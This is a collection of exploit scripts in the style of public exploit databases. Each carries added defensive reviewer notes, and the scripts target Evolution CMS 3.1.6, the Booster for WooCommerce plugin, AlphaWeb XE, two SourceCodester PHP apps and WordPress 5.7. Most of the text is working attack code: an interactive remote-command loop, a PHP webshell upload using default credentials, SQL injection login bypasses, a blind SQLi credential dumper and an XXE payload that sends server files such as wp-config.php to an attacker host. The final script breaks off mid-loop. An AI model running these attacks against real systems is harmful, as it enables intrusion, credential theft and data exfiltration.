
# Exploit Title: Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)
# Date: 15-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://evo.im/
# Software Link: https://github.com/evolution-cms/evolution/releases
# Version: 3.1.6
# Category: Webapps
# Tested on: Linux/Windows
# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
#          python3 exploit.py -h
#
# Reviewer notes (defensive context, from the requests this script sends):
# - The weakness is that a manager account with module-creation rights can
#   store PHP in a module body (the `post` field of the a=109 save action) and
#   have the CMS execute it through the module runner (a=112). Treat the
#   "create/edit modules" permission as equivalent to code execution on the
#   web host and grant it accordingly; upgrade past the affected version.
# - Detection: a POST to /manager/index.php with a=109 whose `post` field
#   contains PHP function calls, followed by GET /manager/index.php?a=112
#   from the same session. Every save below targets module id=1, so a module
#   named "rce" appearing or changing repeatedly is a strong indicator.
from bs4 import BeautifulSoup
from time import sleep
import requests
import argparse
import sys


def main():
    """Parse -u/-l/-p, print the banner and hand the namespace to exploit()."""
    parser = argparse.ArgumentParser(description='Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)')
    parser.add_argument('-u', '--host', type=str, required=True)
    parser.add_argument('-l', '--login', type=str, required=True)
    parser.add_argument('-p', '--password', type=str, required=True)
    args = parser.parse_args()
    print("\nEvolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)", "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
    sleep(2)
    exploit(args)


def exploit(args):
    """Log in to /manager, save module id 1 with a PHP body, then loop over
    user-entered commands, re-saving the module and triggering it via a=112.

    args: argparse namespace with host, login and password. args.host is
    normalised in place (scheme added, trailing slash removed).
    Every failure path terminates the process with exit(1) rather than
    raising, so callers cannot recover from a failed login.
    """
    #Check http or https
    if args.host.startswith(('http://', 'https://')):
        print("[?] Check Url...\n")
        args.host = args.host
        if args.host.endswith('/'):
            args.host = args.host[:-1]
        sleep(2)
    else:
        print("\n[?] Check Adress...\n")
        args.host = "http://" + args.host
        args.host = args.host
        if args.host.endswith('/'):
            args.host = args.host[:-1]
        sleep(2)
    # Check Host Status
    # NOTE(review): this GET carries no timeout, unlike every later request,
    # so an unresponsive host blocks here indefinitely.
    try:
        response = requests.get(args.host)
        if response.status_code != 200:
            print("[-] Address not reachable!")
            sleep(2)
            exit(1)
    except requests.ConnectionError as exception:
        print("[-] Address not reachable!")
        sleep(2)
        exit(1)
    # Login and cookie set
    session = requests.session()
    url = args.host + "/manager/?a=0"
    # The cookie values below are constants copied from the author's captured
    # session and are sent unchanged on every request; only "evoq28fzr" is
    # replaced later with the value the server hands back at login.
    cookies = {
        "mybb[lastvisit]": "1631537273",
        "loginattempts": "1",
        "mybb[lastactive]": "1631537588",
        "mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn",
        "evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq",
        "KCFINDER_showname": "on",
        "KCFINDER_showsize": "off",
        "KCFINDER_showtime": "off",
        "KCFINDER_order": "name",
        "KCFINDER_orderDesc": "off",
        "KCFINDER_view": "thumbs",
        "KCFINDER_displaySettings": "off",
        "evoq28fzr": "o0hd9im6q76pptjcsjeaa693os"
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
        "Content-Type": "application/x-www-form-urlencoded;",
        "Accept": "*/*",
        "Origin": args.host,
        "Referer": args.host + "/manager/",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "close"
    }
    data = {
        "ajax": "1",
        "username": args.login,
        "password": args.password,
        "rememberme": "1"
    }
    response = session.post(url, headers=headers, cookies=cookies, data=data, timeout=5)
    new_cookie = response.cookies.get("evoq28fzr")
    # Despite the name, user_role is the value of the "modx_remember_manager"
    # cookie; it is only used as a login-success signal and printed.
    user_role = response.cookies.get("modx_remember_manager")
    if user_role is None:
        print("[-] Login Failed!\n")
        print("[*]",response.text)
        sleep(2)
        exit(1)
    else:
        print("[+] Login Success!\n")
        sleep(2)
        print("[!] Login User", user_role,"\n")
        sleep(2)
    # User authorization check
    # A first module save (a=109, id=1) is used purely to learn whether the
    # account may create modules; the response page is inspected below.
    url = args.host + "/manager/index.php"
    cookies = {
        "mybb[lastvisit]": "1631537273",
        "loginattempts": "1",
        "mybb[lastactive]": "1631537588",
        "mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn",
        "evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq",
        "KCFINDER_showname": "on",
        "KCFINDER_showsize": "off",
        "KCFINDER_showtime": "off",
        "KCFINDER_order": "name",
        "KCFINDER_orderDesc": "off",
        "KCFINDER_view": "thumbs",
        "KCFINDER_displaySettings": "off",
        "webfxtab_modulePane": "0",
        "evoq28fzr": new_cookie,
    }
    headers = {
        "Cache-Control": "max-age=0",
        "Upgrade-Insecure-Requests": "1",
        "Origin": args.host,
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": args.host + "/manager/index.php?a=108&id=1",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "close"
    }
    data = {
        "a": "109",
        "id": "1",
        "mode": "108",
        "stay": "2",
        "name": "rce",
        "description": "<strong>0.1.3</strong> first repository for Evolution CMS ",
        "categoryid": "1",
        "newcategory": '',
        "icon": '',
        "resourcefile": '',
        "post": "system('whoami');",
        "guid": "8d4669cac3afd1f59d416f11eadf3355",
        "properties": "{}",
        "chkallgroups": "on",
        "save": "Submit"
    }
    response = requests.post(url, headers=headers, cookies=cookies, data=data, timeout=5)
    soup = BeautifulSoup(response.text, 'html.parser')
    # NOTE(review): both checks index [0] without guarding; a page with no
    # <title> or no <p> raises IndexError instead of reporting a clean failure.
    if soup.find_all("title")[0].text == "My Evolution Site (Evolution CMS Manager Login)":
        print("[!] Unauthorized user\n\n")
        print("User with module creation permissions is required.")
        exit(1)
    elif soup.find_all("p")[0].text == "You don't have enough privileges for this action!":
        print("[!] Unauthorized user\n\n")
        print("User with module creation permissions is required.")
        exit(1)
    else:
        print ("[+] Exploit Done!\n")
        sleep(2)
        pass
    # Interactive loop: each command is written into the module body
    # (a=109 save) and then executed by requesting the module runner (a=112).
    # The loop has no exit condition other than EOF/interrupt on input().
    while True:
        cmd = input("$ ")
        # Update Modules
        url = args.host + "/manager/index.php"
        cookies = {
            "mybb[lastvisit]": "1631537273",
            "loginattempts": "1",
            "mybb[lastactive]": "1631537588",
            "mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn",
            "evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq",
            "KCFINDER_showname": "on",
            "KCFINDER_showsize": "off",
            "KCFINDER_showtime": "off",
            "KCFINDER_order": "name",
            "KCFINDER_orderDesc": "off",
            "KCFINDER_view": "thumbs",
            "KCFINDER_displaySettings": "off",
            "webfxtab_modulePane": "0",
            "evoq28fzr": new_cookie,
        }
        headers = {
            "Cache-Control": "max-age=0",
            "Upgrade-Insecure-Requests": "1",
            "Origin": args.host,
            "Content-Type": "application/x-www-form-urlencoded",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
            "Referer": args.host + "/manager/index.php?a=108&id=1",
            "Accept-Encoding": "gzip, deflate",
            "Accept-Language": "en-US,en;q=0.9",
            "Connection": "close"
        }
        data = {
            "a": "109",
            "id": "1",
            "mode": "108",
            "stay": "2",
            "name": "rce",
            "description": "<strong>0.1.3</strong> first repository for Evolution CMS ",
            "categoryid": "1",
            "newcategory": '',
            "icon": '',
            "resourcefile": '',
            "post": "system('"+cmd+"');",
            "guid": "8d4669cac3afd1f59d416f11eadf3355",
            "properties": "{}",
            "chkallgroups": "on",
            "save": "Submit"
        }
        response = requests.post(url, headers=headers, cookies=cookies, data=data, timeout=5)
        # Run Modules
        url = args.host + "/manager/index.php?id=1&a=112"
        cookies = {
            "mybb[lastvisit]": "1631537273",
            "loginattempts": "1",
            "mybb[lastactive]": "1631537588",
            "mybbuser": "2_IFsbw9XQFguv1DM0ygBdbkeg3v0zmQPpW6it5MjHev7gz3nkNn",
            "evo_session": "Kp9j1QushJrXYwhHiHS1dqntLiTnTiBQ25ZUDndq",
            "KCFINDER_showname": "on",
            "KCFINDER_showsize": "off",
            "KCFINDER_showtime": "off",
            "KCFINDER_order": "name",
            "KCFINDER_orderDesc": "off",
            "KCFINDER_view": "thumbs",
            "KCFINDER_displaySettings": "off",
            "webfxtab_modulePane": "0",
            "evoq28fzr": new_cookie,
        }
        headers = {
            "Upgrade-Insecure-Requests": "1",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
            "Referer": args.host + "/manager/index.php?a=108&id=1",
            "Accept-Encoding": "gzip, deflate",
            "Accept-Language": "en-US,en;q=0.9",
            "Connection": "close"
        }
        response = requests.get(url, headers=headers, cookies=cookies, timeout=5)
        # An empty body is treated as "command produced no output".
        if response.text == "":
            print(cmd + ": command not found\n")
        else:
            print(response.text)


if __name__ == '__main__':
    main()
# Exploit Title: WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass
# Date: 2021-09-16
# Exploit Author: Sebastian Kriesten (0xB455)
# Contact: https://twitter.com/0xB455
#
# Affected Plugin: Booster for WooCommerce
# Plugin Slug: woocommerce-jetpack
# Vulnerability disclosure: https://www.wordfence.com/blog/2021/08/critical=-authentication-bypass-vulnerability-patched-in-booster-for-woocommerce/
# Affected Versions: <= 5.4.3
# Fully Patched Version: >= 5.4.4
# CVE: CVE-2021-34646
# CVSS Score: 9.8 (Critical)
# Category: webapps
#
# 1:
# Goto: https://target.com/wp-json/wp/v2/users/
# Pick a user-ID (e.g. 1 - usually is the admin)
#
# 2:
# Attack with: ./exploit_CVE-2021-34646.py https://target.com/ 1
#
# 3:
# Check out which of the generated links allows you to access the system
#
# Reviewer notes (defensive context):
# - Root cause as this script demonstrates it: the e-mail verification "code"
#   is md5() of a unix timestamp, and the server's own Date header reveals
#   that timestamp, so the token is derived from public, predictable input
#   rather than from a secret. Upgrading to the patched version (>= 5.4.4,
#   per the header above) is the fix.
# - Detection: a request carrying `?wcj_user_id=` followed within seconds by
#   several `my-account/?wcj_verify_email=` requests whose tokens differ only
#   in the embedded hash.
import requests,sys,hashlib
import argparse
import datetime
import email.utils
import calendar
import base64

# ANSI colour escapes used only for terminal output.
B = "\033[94m"
W = "\033[97m"
R = "\033[91m"
RST = "\033[0;0m"

parser = argparse.ArgumentParser()
parser.add_argument("url", help="the base url")
# NOTE(review): a positional argument with default= but without nargs='?' is
# still required by argparse, so the default of 1 never applies.
parser.add_argument('id', type=int, help='the user id', default=1)
args = parser.parse_args()
# `id` and, below, `hash` shadow Python builtins.
id = str(args.id)
url = args.url
if args.url[-1] != "/": # URL needs trailing /
    url = url + "/"
verify_url= url + "?wcj_user_id=" + id
# The only purpose of this request is to read the server's Date header.
r = requests.get(verify_url)
if r.status_code != 200:
    print("status code != 200")
    print(r.headers)
    sys.exit(-1)


def email_time_to_timestamp(s):
    """Convert an RFC 2822 date string (e.g. an HTTP Date header) to unix seconds.

    Returns None when the string cannot be parsed. The tz offset returned in
    tt[9] is subtracted so the result is UTC.
    """
    tt = email.utils.parsedate_tz(s)
    if tt is None:
        return None
    return calendar.timegm(tt) - tt[9]


date = r.headers["Date"]
unix = email_time_to_timestamp(date)


def printBanner():
    """Print the observed server time (raw and unix) and a usage hint."""
    print(f"{W}Timestamp: {B}" + date)
    print(f"{W}Timestamp (unix): {B}" + str(unix) + f"{W}\n")
    print("We need to generate multiple timestamps in order to avoid delay related timing errors")
    print("One of the following links will log you in...\n")


printBanner()

# Three candidate timestamps (t, t-1, t-2) are tried to absorb clock skew
# between the Date header and the moment the server computed its hash.
for i in range(3): # We need to try multiple timestamps as we don't get the exact hash time and need to avoid delay related timing errors
    hash = hashlib.md5(str(unix-i).encode()).hexdigest()
    print(f"{W}#" + str(i) + f" link for hash {R}"+hash+f"{W}:")
    token='{"id":"'+ id +'","code":"'+hash+'"}'
    token = base64.b64encode(token.encode()).decode()
    token = token.rstrip("=") # remove trailing =
    link = url+"my-account/?wcj_verify_email="+token
    print(link + f"\n{RST}")
# Exploit Title: AlphaWeb XE - File Upload Remote Code Execution (RCE) (Authenticated)
# Date: 09/09/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# Vendor website: https://www.zenitel.com/
# Product website: https://wiki.zenitel.com/wiki/AlphaWeb
# Example: python3 CVE-2021-40845.py -u "http://$ip:80/" -c "whoami"
# Reference: https://github.com/ricardojoserf/CVE-2021-40845
#
# Reviewer notes (defensive context):
# - Two weaknesses are chained: vendor default credentials (the four values
#   below) and an upload endpoint (/php/script_uploads.php) that accepts a
#   .php file which is then served, and executed, from /cmd/. Changing the
#   default accounts removes the precondition; the upload handler should
#   reject executable extensions and store uploads outside the web root.
# - Detection: a POST to /php/script_uploads.php carrying a .php filename
#   followed by requests to /cmd/<name>.php?cmd= from the same client.
import requests
import base64
import argparse

# Default credentials, change them if it is necessary
admin_user = "admin"
admin_pass = "alphaadmin"
scripter_user = "scripter"
scripter_pass = "alphascript"


def get_args():
    """Parse -u/--url and -c/--command (both required) and return the namespace."""
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', required=True, action='store', help='Target url')
    parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
    my_args = parser.parse_args()
    return my_args


def main():
    """Authenticate, upload poc.php via the scripter account, request it with
    ?cmd= and print the response with the <pre> wrapper stripped.

    Neither the login response nor the upload response is checked, so a
    failed upload only shows up as an unhelpful final response body.
    """
    args = get_args()
    base_url = args.url
    url_main = base_url + "/php/index.php"
    url_upload = base_url + "/php/script_uploads.php"
    command = args.command
    uploaded_file = "poc.php"
    # The command is interpolated into the query string without URL-encoding.
    url_cmd = base_url + "/cmd/" + uploaded_file + "?cmd=" + command
    # HTTP Basic credentials: admin for the index page, scripter for the upload.
    login_authorization = "Basic " + str(base64.b64encode((admin_user+':'+admin_pass).encode('ascii')).decode('ascii'))
    upload_authorization = "Basic " + str(base64.b64encode((scripter_user+":"+scripter_pass).encode('ascii')).decode('ascii'))
    headers_login = {
        "Authorization": login_authorization,
        "Cache-Control": "max-age=0"
    }
    headers_upload = {
        'Authorization': upload_authorization,
        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="92"',
        'sec-ch-ua-mobile': '?0',
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'Sec-Fetch-Site': 'same-origin',
        'Sec-Fetch-Mode': 'navigate',
        'Sec-Fetch-User': '?1',
        'Sec-Fetch-Dest': 'iframe',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'en-US,en;q=0.9',
    }
    files = {
        "userfile":(uploaded_file, "<?php if(isset($_REQUEST['cmd'])){ echo \"<pre>\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"</pre>\"; die; }?>"),
    }
    s = requests.session()
    # Login as admin
    s.get(url_main, headers = headers_login)
    # Upload file
    upload = s.post(url_upload, files=files, headers = headers_upload)
    # Execute command
    cmd = s.post(url_cmd)
    print(cmd.text.replace("<pre>","").replace("</pre>",""))


if __name__ == "__main__":
    main()
  4. # Exploit Title: Simple Attendance System 1.0 - Authenticated bypass # Exploit Author: Abdullah Khawaja (hax.3xploit) # Date: September 17, 2021 # Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/attendance_0.zip # Tested on: Linux, windows # Vendor: oretnom23 # Version: v1.0 # Exploit Description: Simple Attendance System is prone to multiple vulnerabilities. An easy authentication bypass vulnerability in the application allows the attacker to log in. ----- PoC: Authentication Bypass ----- Administration Panel: http://localhost/attendance/login.php Username: admin' or ''=' -- -+ Password: admin' or ''=' -- -+ ----- PoC-2: Authentication Bypass ----- Steps: 1. Enter wrong credentials at http://localhost/attendance/login.php 2. Capture the request in Burp and send it to Repeater. 3. Forward the request. 4. In the response tab, replace: {"status":"failed","msg":"Invalid username or password."} with {"status":"success","msg":"Login successfully."}
# Exploit Title: Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)
# Exploit Author: Bobby Cooke (@0xBoku) & Adeeb Shah (@hyd3sec)
# Date: 16/09/2021
# Vendor Homepage: https://www.sourcecodester.com/php/12469/library-management-system-using-php-mysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/librarymanagement.zip
# Vendor: breakthrough2
# Tested on: Kali Linux, Apache, Mysql
# Version: v1.0
# Exploit Description:
# Library Management System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack.
# Exploitation Walkthrough: https://0xboku.com/2021/09/14/0dayappsecBeginnerGuide.html
#
# Reviewer notes (defensive context):
# - Injection point exercised here: the POST `id` parameter of
#   /LibraryManagement/fine-student.php (sent together with check=1). The fix
#   on the application side is a parameterised query for that lookup.
# - Detection: bursts of POSTs to that path whose `id` value contains
#   UNION SELECT / sleep( and whose response times cluster around one second.
# - Known defects in this script (left as-is, documented below): `re` and
#   `sys` are used but never imported; printTableRow references an undefined
#   `name`; only 7 characters per column are recovered.
import requests,argparse
from colorama import (Fore as F, Back as B, Style as S)
BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT


def bullet(char,color):
    """Return a coloured "[char] " prefix; color 'B' blue, 'R' red, anything else green."""
    C=FB if color == 'B' else FR if color == 'R' else FG
    return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '


info,err,ok = bullet('-','B'),bullet('!','R'),bullet('+','G')
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
# Module-level proxy map used by postRequest(); note that the https entry
# also points at a plain http:// proxy URL.
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}


# POST /LibraryManagement/fine-student.php
# inject' UNION SELECT IF(SUBSTRING(password,1,1) = '1',sleep(1),null) FROM admin WHERE adminId=1; -- kamahamaha
def sqliPayload(char,position,userid,column,table):
    """Build the time-based probe for one character: sleep(1) fires only when
    SUBSTRING(column, position, 1) equals char for the row adminId=userid."""
    sqli = 'inject\' UNION SELECT IF(SUBSTRING('
    sqli += str(column)+','
    sqli += str(position)+',1) = \''
    sqli += str(char)+'\',sleep(1),null) FROM '
    sqli += str(table)+' WHERE adminId='
    sqli += str(userid)+'; -- kamahamaha'
    return sqli


# Candidate alphabet, tried in this order for every position.
chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',
'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D',
'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S',
'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7',
'8','9','@','#']


def postRequest(URL,sqliReq,char,position,pxy):
    """POST the probe as form field `id` (with check=1) and return the elapsed
    seconds. `pxy` is used only as a boolean; the proxy actually applied is
    the module-level `proxies`. char/position are unused apart from the
    commented-out debug print. TLS verification is disabled."""
    sqliURL = URL
    params = {"check":1,"id":sqliReq}
    if pxy:
        req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies,timeout=10)
    else:
        req = requests.post(url=sqliURL, data=params, verify=False, timeout=10)
    #print("{} : {}".format(char,req.elapsed.total_seconds()))
    return req.elapsed.total_seconds()


def theHarvester(target,CHARS,url,pxy):
    """Recover positions 1..7 of target['column'] for target['id'] in
    target['table'] by timing; a response slower than one second is taken as
    a hit. A position with no hit (or a slow network causing a false hit) is
    silently skipped or mis-read, so the result may be shorter or wrong."""
    #print("Retrieving: {} {} {}".format(target['table'],target['column'],target['id']))
    position = 1
    theHarvest = ""
    while position < 8:
        for char in CHARS:
            sqliReq = sqliPayload(char,position,target['id'],target['column'],target['table'])
            if postRequest(url,sqliReq,char,position,pxy) > 1:
                theHarvest += char
                break;
        position += 1
    return theHarvest


class userObj:
    """Plain holder for one recovered username/password pair."""
    def __init__(self,username,password):
        self.username = username
        self.password = password


class tableSize:
    """Column widths plus the coloured header strings for the output table."""
    def __init__(self,sizeU,sizeP):
        self.sizeU = sizeU
        self.sizeP = sizeP
        self.uTitle = "Admin Usernames"+" "*(sizeU-15)+BR+" "+ST
        self.pTitle = "Admin Passwords"+" "*(sizeP-15)+BR+" "+ST
    def printHeader(self):
        """Print the red rule, the two column titles, and a second rule."""
        width = self.sizeU+self.sizeP+3
        print(BR+" "*width+ST)
        print(self.uTitle,self.pTitle)
        print(BR+" "*width+ST)


def printTableRow(user,size):
    """Print one padded row. NOTE(review): the else-branch for a username of
    length >= size.sizeU assigns to `name`, which is never defined, so that
    path raises NameError instead of truncating like the password branch."""
    username = user.username
    unLen = len(username)
    if unLen < size.sizeU:
        username = username+(" "*(size.sizeU - unLen))
    else:
        name = name[:size.sizeU]
    username += BR+" "+ST
    password = user.password
    pLen = len(password)
    if pLen < size.sizeP:
        password = password+(" "*(size.sizeP - pLen))
    else:
        password = password[:size.sizeP]
    password += BR+" "+ST
    print(username,password)


def sig():
    """Return the coloured ASCII-art signature banner."""
    SIG = SB+FY+" .-----.._ ,--.\n"
    SIG += FY+" | .. > ___ | | .--.\n"
    SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __\n"
    SIG += FY+" | </ "+FR+"* * *"+FY+" \ / \\/ \\\n"
    SIG += FY+" | |> ) "+FR+" * *"+FY+" / \\ \\\n"
    SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\\n"
    SIG += FY+" _______"+FR+"github.com/boku7"+FY+"_____\n"+ST
    return SIG


def argsetup():
    """Parse targetHost, DumpXAdmins and optional -p/--proxy.

    NOTE(review): the -p branch calls re.match and sys.argv/sys.exit, but
    neither `re` nor `sys` is imported in this file, so supplying -p raises
    NameError. The dict built here is also never consumed: postRequest()
    only tests pxy for truthiness and uses the module-level `proxies`.
    """
    about = SB+FT+'Unauthenticated Blind Time-Based SQL Injection Exploit - Library Manager'+ST
    parser = argparse.ArgumentParser(description=about)
    parser.add_argument('targetHost',type=str,help='The DNS routable target hostname. Example: "http://0xBoku.com"')
    parser.add_argument('DumpXAdmins',type=int,help='Number of admin credentials to dump. Example: 5')
    parser.add_argument('-p','--proxy',type=str,help='<127.0.0.1:8080> Proxy requests sent')
    args = parser.parse_args()
    if args.proxy:
        regex = '^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[0-9]{2,5}$'
        if re.match(regex,args.proxy,re.IGNORECASE):
            args.proxy = {'http':'http://{}'.format(args.proxy),'https':'https://{}'.format(args.proxy)}
        else:
            print('{}Error: Supplied proxy argument {} fails to match regex {}'.format(err,args.proxy,regex))
            print('{}Example: {} -p "127.0.0.1:8080"'.format(err,sys.argv[0]))
            sys.exit(-1)
    else:
        proxy = False
    return args


if __name__ == "__main__":
    header = SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke\n'+ST
    print(header)
    print(sig())
    args = argsetup()
    host = args.targetHost
    pxy = args.proxy
    admins = args.DumpXAdmins
    PATH = host+"/LibraryManagement/fine-student.php"
    size = tableSize(20,20)
    size.printHeader()
    # adminId values are assumed to be contiguous from 1; a gap yields an
    # empty row rather than an error.
    dumpnumber = 1
    while dumpnumber <= admins:
        adminUsername = { "id":dumpnumber, "table":"admin", "column":"username"}
        adminUsername = theHarvester(adminUsername,chars,PATH,pxy)
        adminPassword = { "id":dumpnumber, "table":"admin", "column":"password"}
        adminPass = theHarvester(adminPassword,chars,PATH,pxy)
        adminUser = userObj(adminUsername,adminPass)
        printTableRow(adminUser,size)
        # print("Admin's Username is: {}".format(adminUsername))
        # print("Admin's Password is: {}".format(adminPass))
        dumpnumber += 1
# Exploit Title: WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)
# Date: 16/09/2021
# Exploit Author: David Utón (M3n0sD0n4ld)
# Vendor Homepage: https://wordpress.com
# Affected Version: WordPress 5.6-5.7 & PHP8
# Tested on: Linux Ubuntu 18.04.5 LTS
# CVE : CVE-2021-29447
#
# Reviewer notes (defensive context):
# - The XML the media library parses comes from the iXML chunk of an uploaded
#   WAV file (see wavCreate). The parser resolves the external DTD, which is
#   what lets a parameter entity read a local file and send it to $lHost.
#   Upgrading WordPress past the affected range removes the issue; blocking
#   outbound HTTP from the web tier neutralises the exfiltration step even on
#   an unpatched host.
# - Detection: a WAV upload to /wp-admin/async-upload.php immediately
#   followed by the WordPress server itself making an outbound GET to an
#   external host on port 8000 for a .dtd file and then a ?p=<base64> URL.

#!/bin/bash
# Author: @David_Uton (m3n0sd0n4ld)
# Usage: $./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST
# Example: $ ./CVE-2021-29447.sh 10.10.XX.XX wptest test ../wp-config.php 10.11.XX.XX

# Variables
rHost=$1
username=$2
password=$3
readFile=$4
lHost=$5

# Functions

# Logotype
logoType(){
    echo "
=====================================
CVE-2021-29447 - WordPress 5.6-5.7 - XXE & SSRF Within the Media Library (Authenticated)
-------------------------------------
@David_Uton (M3n0sD0n4ld)
https://m3n0sd0n4ld.github.io/
====================================="
}

# Create wav malicious
# Minimal RIFF/WAVE container whose only chunk is "iXML"; the chunk body is
# the XML document with the external DTD reference.
wavCreate(){
    echo -en "RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version='1.0'?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://$lHost:8000/xx3.dtd'>%remote;%init;%trick;]>\x00" > payload.wav && echo "[+] Create payload.wav"
}

# Create xx3.dtd
# Served by the local http.server; reads $readFile through php://filter
# (deflate + base64 so the content survives being placed in a URL).
dtdCreate(){
cat <<EOT > xx3.dtd
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=$readFile">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://$lHost:8000/?p=%file;'>" >
EOT
}

# wav upload
# Writes a throwaway Python helper (credentials and host are interpolated by
# the shell at heredoc expansion time) that logs in, fetches the media
# _wpnonce and uploads payload.wav.
wavUpload(){
cat <<EOT > .upload.py
#/usr/bin/env python3
import requests, re, sys
postData = {
    'log':"$username",
    'pwd':"$password",
    'wp-submit':'Log In',
    'redirect_to':'http://$rHost/wp-admin/',
    'testcookie':1
}
r = requests.post('http://$rHost/wp-login.php',data=postData, verify=False) # SSL == verify=True
cookies = r.cookies
print("[+] Getting Wp Nonce ... ")
res = requests.get('http://$rHost/wp-admin/media-new.php',cookies=cookies)
wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)
if len(wp_nonce_list) == 0 :
    print("[-] Failed to retrieve the _wpnonce")
    exit(0)
else :
    wp_nonce = wp_nonce_list[0]
    print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce)
print("[+] Uploading the wav file ... ")
postData = {
    'name': 'payload.wav',
    'action': 'upload-attachment',
    '_wpnonce': wp_nonce
}
wav = {'async-upload': ('payload.wav', open('payload.wav', 'rb'))}
r_upload = requests.post('http://$rHost/wp-admin/async-upload.php', data=postData, files=wav, cookies=cookies)
if r_upload.status_code == 200:
    image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0]
    _wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0]
    print('[+] Wav uploaded successfully')
else :
    print("[-] Failed to receive a response for uploaded! Try again . \n")
    exit(0)
EOT
python3 .upload.py
}

# Server Sniffer
# Background http.server on the default port (8000); its request log is the
# channel the exfiltrated data arrives on. The PID is kept for cleanup.
serverSniffer(){
    statusServer=$(python3 -m http.server &> http.server.log & echo $! > http.server.pid)
}

# Load file and decoder
# Busy-waits until the server log is non-empty, extracts the ?p= value and
# decodes it with a throwaway PHP script; a decode.php under 47 bytes means
# the p= value was empty (file missing or unreadable).
loadFile(){
    content="http.server.log"
    wavUpload
    while :
    do
        if [[ -s $content ]]; then
            echo "[+] Obtaining file information..."
            sleep 5s # Increase time if the server is slow
            base64=$(cat $content | grep -i '?p=' | cut -d '=' -f2 | cut -d ' ' -f1 | sort -u)
            # Check file exists
            echo "<?php echo zlib_decode(base64_decode('$base64')); ?>" > decode.php
            sizeCheck=$(wc -c decode.php | awk '{printf $1}')
            if [[ $sizeCheck -gt "46" ]]; then
                php decode.php
            else
